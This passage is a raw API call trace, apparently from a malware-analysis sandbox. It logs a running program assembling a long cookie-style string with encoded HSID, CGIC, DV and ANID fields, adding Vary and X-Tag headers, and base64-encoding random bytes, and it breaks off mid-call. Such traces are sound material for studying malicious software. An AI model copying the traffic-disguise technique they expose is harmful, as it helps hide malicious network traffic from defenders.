lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D", lpString2=";" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D;") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D;" [0143.801] GetProcessHeap () returned 0x440000 [0143.801] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caf2a0 | out: hHeap=0x440000) returned 1 [0143.801] GetProcessHeap () returned 0x440000 [0143.801] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2ca9e30 | out: hHeap=0x440000) returned 1 [0143.801] GetProcessHeap () returned 0x440000 [0143.801] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2caee90 | out: hHeap=0x440000) returned 1 [0143.801] GetProcessHeap () returned 0x440000 [0143.801] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cabdd0 | out: hHeap=0x440000) returned 1 [0143.801] GetProcessHeap () returned 0x440000 [0143.801] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cabd50 | out: hHeap=0x440000) returned 1 [0143.801] GetProcessHeap () returned 0x440000 [0143.801] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cabc80 | out: hHeap=0x440000) returned 1 [0143.801] GetProcessHeap () returned 0x440000 [0143.801] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cabda0 | out: hHeap=0x440000) returned 1 [0143.801] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.801] lstrlenA (lpString="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D;") returned 1512 [0143.801] GetProcessHeap () returned 0x440000 [0143.802] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2c94460, Size=0x613) returned 0x2caee90 [0143.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0143.802] lstrcpyA (in: lpString1=0x2caeeba, lpString2="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D;" | out: lpString1="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D;") returned="HSID=cFcTO%2FN4iI6zY3IkaXgXZFB%2BrpbMSLlCkzhVtkn3Dw1Era9c1D7TRGG6e2i%2BA%2F4QFJ1NARtrIz19YW9OX6gToAVuCp9U9eMF8bv7pO%2B3B%2FjhVRQtPWGMxDKUSWZs85YXkD4KjuPAOO89hekOjtA1Z1r6D9xIKX%2FQ5MN6tJKRjvaV54CTriLps3HgcObuA8K%2FT5QO%2FUrBok4ht%2FC6f30DXJjaH5Xn5wLqej1cD9eAQbGX69abfEyPRbGGjFfCseF2mfR9dRC3JfQUN9eH2mHRcJgRpULBQ3xDvcgtcfR%2BiNe7mSs2PQX3p49khCdILom84UclfT0r%2B9uGb6U5WdTpPw%3D%3D;CGIC=gq8ZNbDF5ks85z4P%2BIMaH%2FzRLe46r7%2F%2Bhnn%2FpDJO9YmEXgEQh2yDpRm3wm6yEc8nw0QU9K1eeO0FbnVhhYzuhW9U2CPf4r9Sa0ADgwo6ZchGF7aQeC26N6C%2FCCbYOrfYNipK%2B2Zc6aerq5aAq%2F5DlAaVWkC3UqSbjwPa87rS4RRJ%2FgQ%2BhUe9KG7SMycbxOmDLWgMm5AorosFNcYgqAbxdUeyPWj58HkitgRmQpb0AnoipNS8s%2BRYlVzgQTpYz2w2ApzBXhbNaHx6H%2BPNhSnIBxjhUJh%2BEnfERdY3%2FereScY2VGlOIu9kQN2qSQB6cX%2FydHVs9oYSGgbalJ9%2FKRtZmA%3D%3D;DV=rbRs7Kwum7yFbPFLH1NE2rjyrBX1iaMxcUd4IAxR3QkVlRi51wc091UqVaDKdz%2BpTz%2FbL%2BVZhsmWoz2g2Xgb%2BFzfk12Yf3NU1xVj6c%2B143X8qFwS1dlCNFUbYXwQdFI7ZgHQxraLzNMjXYCYhhg7C47EFej32JknUm9g2YBq0ADG1xqtGv7XnzE4yb02aWUXhQ8sA8ic0fjQWELZNp1G7WUnHGpGUJLlgIAzTjRWORMxzLCGlpnPUuEeTFWW7WYIRFDTv08TJlTgi3%2BqbyG7ElLS4YvRojQ%2F0o7MhHYSScah%2BdAbg%2FLnsA8xyrzhYT0LEdXk0BgPkjyYGSZG1CwuPg%3D%3D;ANID=yDGNghH7ddRuBJtNp%2Fo1T4o%2FJbdTkGIgmT3kcpI38m9EUO8mVzXDzsUgmfz3Fcjh4Y4ehmqe5K9Xrf3BY2Z7Nu46fkefDS%2FJNkcokXYXJLWSiJOXW8obvErhIaQ7wqr3Djn9%2F3G%2BNPk%2BTmHr9%2FZIwuflBRrleWftdkqTw45Js6kM9FuvqlYN1YunukL2Q3rREJ%2FaF7tCdGnaeQL5u58%2BOBql0O3MMYb720Cf0%2BXjjLw2aq7zxg%2FfbKzWY7OOhd0QKQVWWvwIgYai01wKQ%2BiCY2cZax1xhwuK3t9C4pd2gImq2Y95xFE1n8EmlTLZuFjCKBt1e1xKKBPx8xAp7mwZ2g%3D%3D;" [0143.802] GetProcessHeap () returned 0x440000 [0143.802] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2cae870 | out: hHeap=0x440000) returned 1 [0143.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.802] lstrlenA (lpString="\r\n") returned 2 [0143.802] GetProcessHeap () returned 0x440000 [0143.802] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x2caee90, Size=0x646) returned 0x2caee90 [0143.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0143.802] lstrcpyA (in: lpString1=0x2caf4a2, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0143.802] StrDupA (lpSrch="Vary") returned="Vary" [0143.802] StrDupA (lpSrch="Var") returned="Var" [0143.802] StrDupA (lpSrch="X-Tag") returned="X-Tag" [0143.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x14f778, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x14f778) returned 0x0 [0143.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x14f778, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x14f778) returned 0x0 [0143.803] lstrlenA (lpString="Var") returned 3 [0143.803] lstrlenA (lpString="X-Tag") returned 5 [0143.803] lstrlenA (lpString="Vary") returned 4 [0143.803] lstrlenA (lpString=": ") returned 2 [0143.803] lstrlenA (lpString="\r\n") returned 2 [0143.803] GetProcessHeap () returned 0x440000 [0143.803] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x499) returned 0x2cae870 [0143.803] GetProcessHeap () returned 0x440000 [0143.803] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x300) returned 0x2caf4f0 [0143.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0143.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2caf4f0, cbBuffer=0x300, dwFlags=0x2 | out: pbBuffer=0x2caf4f0) returned 0x0 [0143.804] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.804] CryptBinaryToStringA (in: pbBinary=0x2caf4f0, cbBinary=0x100, dwFlags=0x40000001, pszString=0x0, pcchString=0x14f68c | out: pszString=0x0, pcchString=0x14f68c) returned 1 [0143.804] GetProcessHeap () returned 0x440000 [0143.804] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x159) returned 0x2caed20 [0143.804] GetProcAddress (hModule=0x7ffc5c190000, lpProcName="CryptBinaryToStringA") returned 0x7ffc5c19dbd0 [0143.806] CryptBinaryToStringA (in: pbBinary=0x2caf4f0, cbBinary=0x100, dwFlags=0x40000001, pszString=0x2caed20, pcchString=0x14f68c | out: pszString="loY7P0M8SqcOPl+XVJh0gjNsyRAbgJGlHC/O9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec+w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pcchString=0x14f68c) returned 1 [0143.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0143.806] lstrlenA (lpString="loY7P0M8SqcOPl+XVJh0gjNsyRAbgJGlHC/O9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec+w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==") returned 344 [0143.806] GetProcessHeap () returned 0x440000 [0143.806] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16f) returned 0x2ca9e30 [0143.806] StrCSpnA (lpStr="loY7P0M8SqcOPl+XVJh0gjNsyRAbgJGlHC/O9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec+w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 14 [0143.806] StrSpnA (psz="+XVJh0gjNsyRAbgJGlHC/O9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec+w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0143.806] StrCSpnA (lpStr="XVJh0gjNsyRAbgJGlHC/O9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec+w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", lpSet="+/=") returned 19 [0143.806] StrSpnA (psz="/O9LThbjgrcsDxm4f5id64Ek3tmApcbZasWftr7erchqfSSQec+w9rhuMIxW/An6LtjUwb04d8t4ElBGTnlNL4NwAv5/aMECdCn1I5CD13zrWM2mdy52aPBmbQ4FCFTAEdMzUmtF27nKX9JFXqiS/wHdlrOOaKVpzpMKWuDUFDQrTzou1Upwcz1AW46pMVPyDJHTatGVr/1MgxNlI3c3lteLbxbpwn7y4quiwiWD/uIF0loJNxXMqx/QZG09nvMU97WiI1cJykoxFm27evIb84pXiT3XCETLDljkJKTnNvRPMQjiR0cw==", pszSet="+/=") returned 1 [0143.806] StrCSpnA 